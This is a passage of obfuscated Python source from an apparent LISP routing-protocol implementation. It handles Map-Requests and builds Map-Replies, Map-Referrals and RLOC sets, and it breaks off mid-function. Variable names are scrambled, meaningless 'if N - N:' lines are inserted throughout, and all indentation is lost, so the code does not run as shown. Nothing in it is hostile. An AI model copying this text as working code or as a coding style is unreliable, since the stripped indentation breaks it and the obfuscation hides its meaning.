if 48 - 48: oO0o . I1ii11iIi11i
if 59 - 59: IiII - Ii1I
if ( lisp_i_am_rtr ) :
lprint ( "Received {} Map-Request, send RLOC-probe Map-Reply" . format ( o00oo ) )
lisp_rtr_process_map_request ( lisp_sockets , map_request , source , port ,
ttl , timestamp )
return
if 62 - 62: OOooOOo * o0oOOo0O0Ooo + IiII * o0oOOo0O0Ooo * i11iIiiIii - O0
if 37 - 37: I1ii11iIi11i - Oo0Ooo . i11iIiiIii / i11iIiiIii + oO0o
lprint ( "Ignoring received {} Map-Request, not an ETR or RTR" . format ( o00oo ) )
return
if 19 - 19: i1IIi / i1IIi - OoooooooOO - OOooOOo . i1IIi
if 57 - 57: OOooOOo / I1ii11iIi11i * oO0o
if 53 - 53: o0oOOo0O0Ooo * Ii1I
if 42 - 42: I11i + iII111i / iIii1I11I1II1
if 1 - 1: O0 - II111iiii
def lisp_process_smr ( map_request ) :
lprint ( "Received SMR-based Map-Request" )
return
if 75 - 75: II111iiii / OoO0O00 % II111iiii
if 3 - 3: Ii1I - Ii1I % I1ii11iIi11i
if 44 - 44: OOooOOo - o0oOOo0O0Ooo
if 69 - 69: IiII + I1ii11iIi11i / o0oOOo0O0Ooo / OOooOOo
if 31 - 31: oO0o + I1ii11iIi11i * i1IIi % I1IiiI % I1IiiI + iIii1I11I1II1
def lisp_process_smr_invoked_request ( map_request ) :
lprint ( "Received SMR-invoked Map-Request" )
return
if 62 - 62: OoooooooOO
if 38 - 38: iII111i % iII111i * ooOoO0o / OoO0O00 + ooOoO0o
if 52 - 52: ooOoO0o . iIii1I11I1II1 / iIii1I11I1II1 % oO0o - oO0o * II111iiii
if 57 - 57: I1Ii111
if 23 - 23: I1ii11iIi11i + II111iiii
if 99 - 99: o0oOOo0O0Ooo . I1IiiI + o0oOOo0O0Ooo * o0oOOo0O0Ooo / O0
if 27 - 27: OOooOOo - I1Ii111
def lisp_build_map_reply ( eid , group , rloc_set , nonce , action , ttl , map_request ,
keys , enc , auth , mr_ttl = - 1 ) :
if 33 - 33: OOooOOo - Ii1I - iII111i + I1ii11iIi11i - i11iIiiIii
ooO0OooOoOoO = map_request . rloc_probe if ( map_request != None ) else False
iI11iii1IIIiI = map_request . json_telemetry if ( map_request != None ) else None
if 6 - 6: O0 - ooOoO0o
if 35 - 35: I1IiiI . iIii1I11I1II1 + IiII / i11iIiiIii - II111iiii . OoooooooOO
i1II1i11 = lisp_map_reply ( )
i1II1i11 . rloc_probe = ooO0OooOoOoO
i1II1i11 . echo_nonce_capable = enc
i1II1i11 . hop_count = 0 if ( mr_ttl == - 1 ) else mr_ttl
i1II1i11 . record_count = 1
i1II1i11 . nonce = nonce
OO0Oo00OO0oo = i1II1i11 . encode ( )
i1II1i11 . print_map_reply ( )
if 70 - 70: II111iiii
IiOo0oOoooO = lisp_eid_record ( )
IiOo0oOoooO . rloc_count = len ( rloc_set )
if ( iI11iii1IIIiI != None ) : IiOo0oOoooO . rloc_count += 1
IiOo0oOoooO . authoritative = auth
IiOo0oOoooO . record_ttl = ttl
IiOo0oOoooO . action = action
IiOo0oOoooO . eid = eid
IiOo0oOoooO . group = group
if 84 - 84: I1ii11iIi11i * Oo0Ooo % I1IiiI - i11iIiiIii . OoooooooOO
OO0Oo00OO0oo += IiOo0oOoooO . encode ( )
IiOo0oOoooO . print_record ( " " , False )
if 62 - 62: iII111i * I1Ii111 / o0oOOo0O0Ooo
iII11iiiIi1i = lisp_get_all_addresses ( ) + lisp_get_all_translated_rlocs ( )
if 41 - 41: iII111i / OoOoOO00 / OoO0O00 / ooOoO0o
iiIII1 = None
for iII in rloc_set :
oOoiii = iII . rloc . is_multicast_address ( )
oOiI111IIIiIii = lisp_rloc_record ( )
II1 = ooO0OooOoOoO and ( oOoiii or iI11iii1IIIiI == None )
Oo0o = iII . rloc . print_address_no_iid ( )
if ( Oo0o in iII11iiiIi1i or oOoiii ) :
oOiI111IIIiIii . local_bit = True
oOiI111IIIiIii . probe_bit = II1
oOiI111IIIiIii . keys = keys
if ( iII . priority == 254 and lisp_i_am_rtr ) :
oOiI111IIIiIii . rloc_name = "RTR"
if 60 - 60: Oo0Ooo * I1ii11iIi11i % OOooOOo / oO0o / Oo0Ooo
if ( iiIII1 == None ) : iiIII1 = iII . rloc
if 53 - 53: ooOoO0o % OoO0O00 * O0 + II111iiii + iIii1I11I1II1
oOiI111IIIiIii . store_rloc_entry ( iII )
oOiI111IIIiIii . reach_bit = True
oOiI111IIIiIii . print_record ( " " )
OO0Oo00OO0oo += oOiI111IIIiIii . encode ( )
if 11 - 11: II111iiii . II111iiii + Ii1I % oO0o
if 69 - 69: iIii1I11I1II1 - O0 . I1Ii111 % I1IiiI / o0oOOo0O0Ooo
if 78 - 78: oO0o
if 20 - 20: i1IIi + i1IIi * i1IIi
if 32 - 32: I1IiiI + IiII + iII111i . iIii1I11I1II1 * Ii1I
if ( iI11iii1IIIiI != None ) :
oOiI111IIIiIii = lisp_rloc_record ( )
if ( iiIII1 ) : oOiI111IIIiIii . rloc . copy_address ( iiIII1 )
oOiI111IIIiIii . local_bit = True
oOiI111IIIiIii . probe_bit = True
oOiI111IIIiIii . reach_bit = True
if ( lisp_i_am_rtr ) :
oOiI111IIIiIii . priority = 254
oOiI111IIIiIii . rloc_name = "RTR"
if 27 - 27: oO0o + Ii1I . i11iIiiIii
o0II1111III = lisp_encode_telemetry ( iI11iii1IIIiI , eo = str ( time . time ( ) ) )
oOiI111IIIiIii . json = lisp_json ( "telemetry" , o0II1111III )
oOiI111IIIiIii . print_record ( " " )
OO0Oo00OO0oo += oOiI111IIIiIii . encode ( )
if 45 - 45: Oo0Ooo - Oo0Ooo . i11iIiiIii + OoOoOO00 - ooOoO0o % Ii1I
return ( OO0Oo00OO0oo )
if 24 - 24: O0 . Oo0Ooo + O0 % Ii1I + OoooooooOO
if 72 - 72: I1ii11iIi11i
if 100 - 100: i11iIiiIii - iII111i - I11i
if 5 - 5: oO0o % IiII * iII111i
if 98 - 98: iII111i / OOooOOo + IiII
if 100 - 100: II111iiii . i11iIiiIii / oO0o - OOooOOo + OoOoOO00 % I1ii11iIi11i
if 82 - 82: ooOoO0o % OOooOOo % Ii1I
def lisp_build_map_referral ( eid , group , ddt_entry , action , ttl , nonce ) :
oO00oO0o = lisp_map_referral ( )
oO00oO0o . record_count = 1
oO00oO0o . nonce = nonce
OO0Oo00OO0oo = oO00oO0o . encode ( )
oO00oO0o . print_map_referral ( )
if 84 - 84: II111iiii . iII111i - OoOoOO00 . i11iIiiIii
IiOo0oOoooO = lisp_eid_record ( )
if 20 - 20: OOooOOo
O000O0 = 0
if ( ddt_entry == None ) :
IiOo0oOoooO . eid = eid
IiOo0oOoooO . group = group
else :
O000O0 = len ( ddt_entry . delegation_set )
IiOo0oOoooO . eid = ddt_entry . eid
IiOo0oOoooO . group = ddt_entry . group
ddt_entry . map_referrals_sent += 1
if 86 - 86: OOooOOo . OOooOOo + IiII - I1ii11iIi11i . OoO0O00
IiOo0oOoooO . rloc_count = O000O0
IiOo0oOoooO . authoritative = True
if 66 - 66: I1IiiI * OoOoOO00 . I1IiiI / Oo0Ooo - Ii1I
if 69 - 69: iIii1I11I1II1 % iII111i + ooOoO0o * i1IIi + iII111i * I1Ii111
if 67 - 67: Ii1I % Oo0Ooo - Oo0Ooo . I11i + IiII
if 73 - 73: Oo0Ooo + iIii1I11I1II1 . iIii1I11I1II1
if 73 - 73: ooOoO0o + OoOoOO00
oO00O0o0Oo = False
if ( action == LISP_DDT_ACTION_NULL ) :
if ( O000O0 == 0 ) :
action = LISP_DDT_ACTION_NODE_REFERRAL
else :
IiI11111I1ii1 = ddt_entry . delegation_set [ 0 ]
if ( IiI11111I1ii1 . is_ddt_child ( ) ) :
action = LISP_DDT_ACTION_NODE_REFERRAL
if 61 - 61: I1Ii111 * I1Ii111 % OOooOOo
if ( IiI11111I1ii1 . is_ms_child ( ) ) :
action = LISP_DDT_ACTION_MS_REFERRAL
if 31 - 31: oO0o + Ii1I - iIii1I11I1II1 / i11iIiiIii
if 9 - 9: IiII % OoO0O00
if 58 - 58: iII111i
if 12 - 12: OoO0O00
if 59 - 59: OOooOOo + i1IIi
if 8 - 8: i1IIi + Oo0Ooo / Ii1I . OoOoOO00 % i1IIi
if 33 - 33: OoooooooOO + iIii1I11I1II1
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : oO00O0o0Oo = True
if ( action in ( LISP_DDT_ACTION_MS_REFERRAL , LISP_DDT_ACTION_MS_ACK ) ) :
oO00O0o0Oo = ( lisp_i_am_ms and IiI11111I1ii1 . is_ms_peer ( ) == False )
if 68 - 68: II111iiii * iIii1I11I1II1 - OoO0O00 - I1ii11iIi11i * II111iiii
if 37 - 37: OoooooooOO - I1ii11iIi11i . O0
IiOo0oOoooO . action = action
IiOo0oOoooO . ddt_incomplete = oO00O0o0Oo
IiOo0oOoooO . record_ttl = ttl
if 65 - 65: I1Ii111 + I1ii11iIi11i % I11i / iII111i
OO0Oo00OO0oo += IiOo0oOoooO . encode ( )
IiOo0oOoooO . print_record ( " " , True )
if 38 - 38: I1IiiI - OOooOOo * OoOoOO00 + O0 * I1IiiI
if ( O000O0 == 0 ) : return ( OO0Oo00OO0oo )
if 8 - 8: I1IiiI
for IiI11111I1ii1 in ddt_entry . delegation_set :
oOiI111IIIiIii = lisp_rloc_record ( )
oOiI111IIIiIii . rloc = IiI11111I1ii1 . delegate_address
oOiI111IIIiIii . priority = IiI11111I1ii1 . priority
oOiI111IIIiIii . weight = IiI11111I1ii1 . weight
oOiI111IIIiIii . mpriority = 255
oOiI111IIIiIii . mweight = 0
oOiI111IIIiIii . reach_bit = True
OO0Oo00OO0oo += oOiI111IIIiIii . encode ( )
oOiI111IIIiIii . print_record ( " " )
if 31 - 31: o0oOOo0O0Ooo + OOooOOo
return ( OO0Oo00OO0oo )
if 7 - 7: IiII + iIii1I11I1II1
if 97 - 97: oO0o
if 52 - 52: I1ii11iIi11i / OoOoOO00 * OoO0O00 + II111iiii * OoooooooOO
if 11 - 11: Ii1I * iII111i * I1IiiI - Oo0Ooo
if 76 - 76: oO0o * II111iiii
if 81 - 81: I11i
if 2 - 2: OoOoOO00
def lisp_etr_process_map_request ( lisp_sockets , map_request , source , sport ,
ttl , etr_in_ts ) :
if 75 - 75: I1IiiI - OoooooooOO * I1Ii111
if ( map_request . target_group . is_null ( ) ) :
II1II1Iii1I = lisp_db_for_lookups . lookup_cache ( map_request . target_eid , False )
else :
II1II1Iii1I = lisp_db_for_lookups . lookup_cache ( map_request . target_group , False )
if ( II1II1Iii1I ) : II1II1Iii1I = II1II1Iii1I . lookup_source_cache ( map_request . target_eid , False )
if 25 - 25: i1IIi * o0oOOo0O0Ooo / oO0o
iIiI1I1ii1I1 = map_request . print_prefix ( )
if 11 - 11: IiII + II111iiii
if ( II1II1Iii1I == None ) :
lprint ( "Database-mapping entry not found for requested EID {}" . format ( green ( iIiI1I1ii1I1 , False ) ) )
if 37 - 37: O0
return
if 98 - 98: IiII * OoooooooOO . iII111i
if 34 - 34: OoooooooOO + I1Ii111
OoO0oO = II1II1Iii1I . print_eid_tuple ( )
if 57 - 57: iII111i
lprint ( "Found database-mapping EID-prefix {} for requested EID {}" . format ( green ( OoO0oO , False ) , green ( iIiI1I1ii1I1 , False ) ) )
if 9 - 9: i1IIi - I1Ii111 + I1Ii111
if 81 - 81: II111iiii % I11i % O0 . I1Ii111 % ooOoO0o - O0
if 58 - 58: OoooooooOO . II111iiii . O0 % I1Ii111 / OoooooooOO
if 64 - 64: Oo0Ooo + oO0o . OoO0O00
if 67 - 67: I11i
o0OO = map_request . itr_rlocs [ 0 ]
if ( o0OO . is_private_address ( ) and lisp_nat_traversal ) :
o0OO = source
if 81 - 81: I1IiiI
if 95 - 95: I1Ii111 . IiII % OoO0O00 - OOooOOo - I11i
OOO0O0O = map_request . nonce
Oo0Oo00Ooo = lisp_nonce_echoing
O0o0O0 = map_request . keys
if 58 - 58: iIii1I11I1II1 / i11iIiiIii . iII111i . OOooOOo * I1ii11iIi11i + OoooooooOO
if 13 - 13: OoooooooOO + iII111i * i11iIiiIii % IiII + oO0o . o0oOOo0O0Ooo
if 31 - 31: o0oOOo0O0Ooo - ooOoO0o
if 40 - 40: O0 / OoOoOO00 - I1Ii111
if 60 - 60: IiII + I1IiiI
o00O00 = map_request . json_telemetry
if ( o00O00 != None ) :
map_request . json_telemetry = lisp_encode_telemetry ( o00O00 , ei = etr_in_ts )
if 20 - 20: iIii1I11I1II1
if 66 - 66: O0 . iIii1I11I1II1 / OoO0O00 . Ii1I * i1IIi * OoooooooOO
II1II1Iii1I . map_replies_sent += 1
if 26 - 26: iIii1I11I1II1 . IiII * Oo0Ooo * OoOoOO00 * O0
OO0Oo00OO0oo = lisp_build_map_reply ( II1II1Iii1I . eid , II1II1Iii1I . group , II1II1Iii1I . rloc_set , OOO0O0O ,
LISP_NO_ACTION , 1440 , map_request , O0o0O0 , Oo0Oo00Ooo , True , ttl )
if 25 - 25: iIii1I11I1II1 . iII111i / II111iiii % OoO0O00 / Ii1I
if 82 - 82: Ii1I . I11i - OOooOOo
if 64 - 64: o0oOOo0O0Ooo - I1Ii111 - Oo0Ooo + OoOoOO00
if 6 - 6: IiII * iIii1I11I1II1 + OOooOOo . OoooooooOO
if 30 - 30: iII111i . IiII % O0 + iII111i % Ii1I
if 72 - 72: II111iiii * ooOoO0o + I1IiiI
if 19 - 19: OoO0O00 * ooOoO0o % I1ii11iIi11i
if 21 - 21: OoO0O00 * I11i
if 76 - 76: I1IiiI - I1ii11iIi11i / I1ii11iIi11i . o0oOOo0O0Ooo % OoooooooOO
if 39 - 39: OoooooooOO % iII111i
if 55 - 55: IiII . i11iIiiIii % OoooooooOO
if 88 - 88: Ii1I * o0oOOo0O0Ooo / oO0o
if 58 - 58: O0
if 43 - 43: O0 / i1IIi / I11i % I1IiiI
if 82 - 82: i11iIiiIii * i11iIiiIii + I1Ii111 - I1ii11iIi11i * oO0o - Ii1I
if 40 - 40: o0oOOo0O0Ooo + OoO0O00 % i1IIi % iII111i * I1Ii111
if ( map_request . rloc_probe and len ( lisp_sockets ) == 4 ) :
iIoo0O0 = ( o0OO . is_private_address ( ) == False )
i1I1IIIi11I = o0OO . print_address_no_iid ( )
if ( iIoo0O0 and i1I1IIIi11I in lisp_rtr_list or sport == 0 ) :
lisp_encapsulate_rloc_probe ( lisp_sockets , o0OO , None , OO0Oo00OO0oo )
return
if 36 - 36: I1ii11iIi11i % II111iiii % I1Ii111 / I1ii11iIi11i
if 34 - 34: OoooooooOO * i11iIiiIii
if 33 - 33: II111iiii
if 59 - 59: iIii1I11I1II1 % I11i
if 93 - 93: I1ii11iIi11i
if 50 - 50: ooOoO0o % OoO0O00 % OoO0O00
lisp_send_map_reply ( lisp_sockets , OO0Oo00OO0oo , o0OO , sport )
return
if 36 - 36: I1IiiI * O0 . IiII / I1Ii111
if 15 - 15: I11i + iII111i
if 79 - 79: i11iIiiIii * IiII % iII111i
if 18 - 18: iIii1I11I1II1 - O0 . o0oOOo0O0Ooo % oO0o
if 73 - 73: IiII + I11i % I1IiiI * iII111i . O0
if 17 - 17: OoO0O00 * OoOoOO00 % O0 % iII111i / i1IIi
if 100 - 100: i11iIiiIii
def lisp_rtr_process_map_request ( lisp_sockets , map_request , source , sport ,
ttl , etr_in_ts ) :
if 54 - 54: O0 * Ii1I + Ii1I
if 59 - 59: i11iIiiIii % iII111i
if 54 - 54: I11i . ooOoO0o / OOooOOo % I1Ii111
if 13 - 13: I11i / O0 . o0oOOo0O0Ooo . ooOoO0o
o0OO = map_request . itr_rlocs [ 0 ]
if ( o0OO . is_private_address ( ) ) : o0OO = source
OOO0O0O = map_request . nonce
if 7 - 7: OoO0O00 + OoooooooOO % II111iiii % oO0o
I11I = map_request . target_eid
o0o0o = map_request . target_group
if 48 - 48: OOooOOo . II111iiii * OOooOOo - I11i / iIii1I11I1II1 / i11iIiiIii
IiIiIiiII1I = [ ]
for I11ii1I11ii in [ lisp_myrlocs [ 0 ] , lisp_myrlocs [ 1 ] ] :
if ( I11ii1I11ii == None ) : continue
OooOOoOO0OO = lisp_rloc ( )
OooOOoOO0OO . rloc . copy_address ( I11ii1I11ii )
OooOOoOO0OO . priority = 254
IiIiIiiII1I . append ( OooOOoOO0OO )
if 38 - 38: iII111i % Ii1I - I1ii11iIi11i * I1Ii111 % iII111i
if 50 - 50: Oo0Ooo + o0oOOo0O0Ooo . OoOoOO00
Oo0Oo00Ooo = lisp_nonce_echoing
O0o0O0 = map_request . keys
if 8 - 8: O0 - i1IIi * oO0o + II111iiii . OoOoOO00
if 4 - 4: I1IiiI - OoO0O00 % o0oOOo0O0Ooo
if 83 - 83: iII111i % iIii1I11I1II1 / OOooOOo - OoOoOO00
if 98 - 98: I11i % oO0o . I1IiiI % OoOoOO00
if 32 - 32: I1ii11iIi11i / Ii1I
o00O00 = map_request . json_telemetry
if ( o00O00 != None ) :
map_request . json_telemetry = lisp_encode_telemetry ( o00O00 , ei = etr_in_ts )
if 54 - 54: I11i - i11iIiiIii
if 91 - 91: Ii1I - OoO0O00 - I1IiiI % OoO0O00 . o0oOOo0O0Ooo
OO0Oo00OO0oo = lisp_build_map_reply ( I11I , o0o0o , IiIiIiiII1I , OOO0O0O , LISP_NO_ACTION ,
1440 , map_request , O0o0O0 , Oo0Oo00Ooo , True , ttl )
lisp_send_map_reply ( lisp_sockets , OO0Oo00OO0oo , o0OO , sport )
return
if 85 - 85: ooOoO0o . ooOoO0o % Oo0Ooo . OOooOOo + OOooOOo / I1IiiI
if 69 - 69: i1IIi + II111iiii / Ii1I
if 4 - 4: I11i * OoOoOO00 % o0oOOo0O0Ooo % ooOoO0o - I1ii11iIi11i
if 88 - 88: iIii1I11I1II1 * iIii1I11I1II1 * I11i * OoOoOO00
if 14 - 14: i11iIiiIii * I1IiiI % O0 % iIii1I11I1II1
if 18 - 18: Oo0Ooo % OOooOOo + IiII
if 28 - 28: OOooOOo . OoO0O00 / o0oOOo0O0Ooo + II111iiii / iIii1I11I1II1 * II111iiii
if 83 - 83: II111iiii . OoOoOO00 - i11iIiiIii . OoOoOO00 . i1IIi % OoooooooOO
if 47 - 47: II111iiii
if 30 - 30: i1IIi . Oo0Ooo / o0oOOo0O0Ooo + IiII * OOooOOo
def lisp_get_private_rloc_set ( target_site_eid , seid , group ) :
IiIiIiiII1I = target_site_eid . registered_rlocs
if 26 - 26: Ii1I % O0 - i1IIi % iII111i * OoO0O00
OOo0oOoOo0ooO = lisp_site_eid_lookup ( seid , group , False )
if ( OOo0oOoOo0ooO == None ) : return ( IiIiIiiII1I )
if 98 - 98: iII111i / I1Ii111
if 69 - 69: Ii1I . Oo0Ooo . iII111i . i1IIi . i1IIi
if 76 - 76: OoooooooOO % IiII
if 81 - 81: iII111i . OOooOOo * i1IIi
iii1iIi11 = None
ooO0Oo = [ ]
for iII in IiIiIiiII1I :
if ( iII . is_rtr ( ) ) : continue
if ( iII . rloc . is_private_address ( ) ) :
III1I = copy . deepcopy ( iII )
ooO0Oo . append ( III1I )
continue
if 95 - 95: i1IIi + iIii1I11I1II1 / iIii1I11I1II1 % iIii1I11I1II1 % OOooOOo
iii1iIi11 = iII
break
if 67 - 67: I1IiiI % OoO0O00 % o0oOOo0O0Ooo % IiII
if ( iii1iIi11 == None ) : return ( IiIiIiiII1I )
iii1iIi11 = iii1iIi11 . rloc . print_address_no_iid ( )
if 33 - 33: ooOoO0o % I1IiiI
if 98 - 98: oO0o . o0oOOo0O0Ooo + II111iiii
if 62 - 62: ooOoO0o - OoooooooOO / I1ii11iIi11i / iII111i - o0oOOo0O0Ooo
if 70 - 70: oO0o % OoooooooOO * I1IiiI - OoOoOO00 * OoOoOO00 . OOooOOo
I11I111Ii1II = None
for iII in OOo0oOoOo0ooO . registered_rlocs :
if ( iII . is_rtr ( ) ) : continue
if ( iII . rloc . is_private_address ( ) ) : continue
I11I111Ii1II = iII
break
if 29 - 29: II111iiii - i11iIiiIii - iII111i + i11iIiiIii . IiII - I1Ii111
if ( I11I111Ii1II == None ) : return ( IiIiIiiII1I )
I11I111Ii1II = I11I111Ii1II . rloc . print_address_no_iid ( )
if 40 - 40: I11i . iII111i + OoOoOO00 % I1ii11iIi11i
if 79 - 79: I1Ii111 - OOooOOo * I1ii11iIi11i + i11iIiiIii . iII111i
if 3 - 3: Oo0Ooo
if 81 - 81: OoO0O00 / OoO0O00 . I1ii11iIi11i
iI1 = target_site_eid . site_id
if ( iI1 == 0 ) :
if ( I11I111Ii1II == iii1iIi11 ) :
lprint ( "Return private RLOCs for sites behind {}" . format ( iii1iIi11 ) )
if 100 - 100: iIii1I11I1II1 % II111iiii - I1ii11iIi11i . iIii1I11I1II1 + IiII % iIii1I11I1II1
return ( ooO0Oo )
if 48 - 48: Ii1I % i1IIi
return ( IiIiIiiII1I )
if 38 - 38: OOooOOo / I1ii11iIi11i % oO0o / o0oOOo0O0Ooo
if 54 - 54: OoOoOO00 * OoooooooOO - OoO0O00 * OoOoOO00 % I1ii11iIi11i * I11i
if 34 - 34: I11i - oO0o + I11i * OoooooooOO * I11i
if 73 - 73: OOooOOo * iII111i * OoO0O00
if 11 - 11: I1Ii111 * II111iiii
if 3 - 3: Oo0Ooo * OOooOOo
if 13 - 13: I1Ii111 + i11iIiiIii / OOooOOo
if ( iI1 == OOo0oOoOo0ooO . site_id ) :
lprint ( "Return private RLOCs for sites in site-id {}" . format ( iI1 ) )
return ( ooO0Oo )
if 98 - 98: I1IiiI * Oo0Ooo
return ( IiIiIiiII1I )
if 9 - 9: O0 / i11iIiiIii . iIii1I11I1II1 . IiII
if 14 - 14: OoOoOO00 . OOooOOo - Oo0Ooo + I1Ii111 % ooOoO0o
if 95 - 95: OoO0O00 * II111iiii + i1IIi
if 22 - 22: Ii1I / ooOoO0o % I11i + OoO0O00 . ooOoO0o
if 61 - 61: O0 - iIii1I11I1II1 * Oo0Ooo . Ii1I + O0
if 20 - 20: ooOoO0o / ooOoO0o - Ii1I - ooOoO0o
if 93 - 93: O0 * OoOoOO00 * iIii1I11I1II1
if 3 - 3: I1ii11iIi11i - O0
if 46 - 46: iII111i
def lisp_get_partial_rloc_set ( registered_rloc_set , mr_source , multicast ) :
o0O00ooOo = [ ]
IiIiIiiII1I = [ ]
if 95 - 95: o0oOOo0O0Ooo % ooOoO0o . OOooOOo . ooOoO0o % iII111i - OOooOOo
if 53 - 53: i11iIiiIii % OoooooooOO . i11iIiiIii
if 66 - 66: I1Ii111 * I1ii11iIi11i . Ii1I
if 28 - 28: oO0o - I1IiiI
if 42 - 42: i1IIi
if 8 - 8: Ii1I - oO0o
OO0i1 = False
ooO0Oo0 = False
for iII in registered_rloc_set :
if ( iII . priority != 254 ) : continue
ooO0Oo0 |= True
if ( iII . rloc . is_exact_match ( mr_source ) == False ) : continue
OO0i1 = True
break
if 74 - 74: i1IIi
if 3 - 3: OoO0O00 - o0oOOo0O0Ooo - Ii1I
if 33 - 33: ooOoO0o + I1ii11iIi11i - I1IiiI . iII111i / OoO0O00
if 91 - 91: OOooOOo - OoooooooOO . OoO0O00
if 34 - 34: Ii1I . I1IiiI . i1IIi * I1ii11iIi11i
if 77 - 77: ooOoO0o . II111iiii
if 41 - 41: IiII
if ( ooO0Oo0 == False ) : return ( registered_rloc_set )
if 27 - 27: IiII / IiII
if 91 - 91: Ii1I
if 93 - 93: OoO0O00 * OoO0O00 * I1ii11iIi11i * OoO0O00 * o0oOOo0O0Ooo
if 84 - 84: I1Ii111 * OoO0O00 - ooOoO0o - Oo0Ooo . OoO0O00 % oO0o
if 98 - 98: OoO0O00 . i1IIi
if 58 - 58: i1IIi * O0 + I1ii11iIi11i . IiII
if 11 - 11: OOooOOo + iIii1I11I1II1 - ooOoO0o * OoO0O00 * i11iIiiIii
if 45 - 45: I1ii11iIi11i + Oo0Ooo
if 7 - 7: Oo0Ooo + ooOoO0o - I1Ii111 * iIii1I11I1II1
if 6 - 6: ooOoO0o % I1Ii111 % ooOoO0o . Ii1I * Oo0Ooo . IiII
OoooO0oo0o0 = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) != None )
if 39 - 39: o0oOOo0O0Ooo
if 73 - 73: IiII
if 92 - 92: OOooOOo / ooOoO0o . I1Ii111 . iII111i / ooOoO0o
if 83 - 83: iIii1I11I1II1 - OoO0O00 - I1Ii111
if 27 - 27: IiII - iII111i * i11iIiiIii % i11iIiiIii + OoOoOO00 . I1Ii111
for iII in registered_rloc_set :
if ( OoooO0oo0o0 and iII . rloc . is_private_address ( ) ) : continue
if ( multicast == False and iII . priority == 255 ) : continue
if ( multicast and iII . mpriority == 255 ) : continue
if ( iII . priority == 254 ) :
o0O00ooOo . append ( iII )
else :
IiIiIiiII1I . append ( iII )
if 10 - 10: IiII / i11iIiiIii
if 6 - 6: I11i - OOooOOo
if 100 - 100: Oo0Ooo / OOooOOo + iII111i - o0oOOo0O0Ooo + OoO0O00 % IiII
if 91 - 91: Ii1I % I11i % Oo0Ooo / OoO0O00 - II111iiii - o0oOOo0O0Ooo
if 50 - 50: OoooooooOO
if 51 - 51: II111iiii - oO0o % OoooooooOO - II111iiii / O0 - OoooooooOO
if ( OO0i1 ) : return ( IiIiIiiII1I )
if 21 - 21: iII111i * o0oOOo0O0Ooo
if 85 - 85: I1ii11iIi11i . OoOoOO00 . i1IIi % OOooOOo * I11i . I1Ii111
if 26 - 26: I1Ii111 + Oo0Ooo + II111iiii % OoOoOO00 % OOooOOo
if 40 - 40: I1ii11iIi11i + i1IIi
if 9 - 9: OOooOOo
if 74 - 74: OoOoOO00 - OOooOOo % OoOoOO00
if 82 - 82: I11i % IiII + Oo0Ooo + iIii1I11I1II1 - I11i - I1IiiI
if 65 - 65: IiII / O0 * II111iiii + oO0o
if 52 - 52: o0oOOo0O0Ooo - OoOoOO00 * II111iiii / OoooooooOO
if 44 - 44: OOooOOo - oO0o + o0oOOo0O0Ooo - i1IIi % o0oOOo0O0Ooo
if 79 - 79: iII111i . iIii1I11I1II1
if 42 - 42: i11iIiiIii / IiII . O0 / OOooOOo . iII111i * i1IIi
IiIiIiiII1I = [ ]
for iII in registered_rloc_set :
if ( iII . rloc . is_ipv6 ( ) ) : IiIiIiiII1I . append ( iII )
if ( iII . rloc . is_private_address ( ) ) : IiIiIiiII1I . append ( iII )
if 83 - 83: iIii1I11I1II1 . II111iiii * Oo0Ooo . I1IiiI - I1IiiI - iIii1I11I1II1
IiIiIiiII1I += o0O00ooOo
return ( IiIiIiiII1I )
if 29 - 29: Oo0Ooo
if 35 - 35: OoOoOO00 + II111iiii
if 46 - 46: O0 / I1ii11iIi11i + OOooOOo - I1Ii111 + I1IiiI - ooOoO0o
if 96 - 96: IiII + i1IIi - I11i * I11i - OoO0O00 % II111iiii
if 47 - 47: I1Ii111 . i11iIiiIii + oO0o . I1ii11iIi11i
if 12 - 12: iIii1I11I1II1 % I1Ii111 * OoOoOO00 / OoooooooOO % OoooooooOO
if 81 - 81: iIii1I11I1II1 - Oo0Ooo - ooOoO0o . OoO0O00 + I1ii11iIi11i
if 84 - 84: iII111i . OOooOOo . iII111i * oO0o % Ii1I . oO0o
if 86 - 86: iII111i * ooOoO0o / iIii1I11I1II1 + Ii1I . iII111i
if 64 - 64: IiII - Oo0Ooo % iII111i % I11i
def lisp_store_pubsub_state ( reply_eid , itr_rloc , mr_sport , nonce , ttl , xtr_id ) :
iIiI1IIi1Ii1i = lisp_pubsub ( itr_rloc , mr_sport , nonce , ttl , xtr_id )
iIiI1IIi1Ii1i . add ( reply_eid )
return ( iIiI1IIi1Ii1i )
if 28 - 28: I1IiiI - I1Ii111
if 60 - 60: OOooOOo / O0 * o0oOOo0O0Ooo * OoooooooOO
if 95 - 95: II111iiii
if 2 - 2: I11i - OoooooooOO / I1ii11iIi11i . I1ii11iIi11i * i11iIiiIii % II111iiii
if 1 - 1: i11iIiiIii / OoOoOO00 - I1ii11iIi11i . I1IiiI / I1Ii111 % iIii1I11I1II1
if 87 - 87: OoOoOO00 - II111iiii + Oo0Ooo
if 44 - 44: i1IIi + I1ii11iIi11i / iIii1I11I1II1
if 47 - 47: I1Ii111
if 41 - 41: IiII
if 25 - 25: I11i % iIii1I11I1II1
if 27 - 27: iIii1I11I1II1 . O0 . oO0o
if 21 - 21: oO0o * I1ii11iIi11i
if 44 - 44: o0oOOo0O0Ooo * IiII - o0oOOo0O0Ooo
if 90 - 90: i1IIi + I1ii11iIi11i * oO0o % i11iIiiIii - OoO0O00
if 12 - 12: OoO0O00 . I1ii11iIi11i - I1IiiI % OOooOOo
def lisp_convert_reply_to_notify ( packet ) :
if 9 - 9: Ii1I / O0
if 95 - 95: iII111i / I11i
if 86 - 86: O0 / II111iiii . Oo0Ooo / Oo0Ooo * II111iiii
if 22 - 22: Ii1I
oo0OOo00OOoO = struct . unpack ( "I" , packet [ 0 : 4 ] ) [ 0 ]
oo0OOo00OOoO = socket . ntohl ( oo0OOo00OOoO ) & 0xff
OOO0O0O = packet [ 4 : 12 ]
packet = packet [ 12 : : ]
if 5 - 5: I1Ii111 * I1IiiI * O0 + I1Ii111
if 19 - 19: i11iIiiIii / IiII - i1IIi - I1IiiI * I11i
if 43 - 43: IiII * Oo0Ooo / OoOoOO00 + I1IiiI - i11iIiiIii + II111iiii
if 81 - 81: I11i / Oo0Ooo % Ii1I % OoO0O00
oOOOoOO = ( LISP_MAP_NOTIFY << 28 ) | oo0OOo00OOoO
i111ii1II11ii = struct . pack ( "I" , socket . htonl ( oOOOoOO ) )
OooooO0o0 = struct . pack ( "I" , 0 )
if 87 - 87: O0 % II111iiii
if 42 - 42: I1IiiI . i1IIi
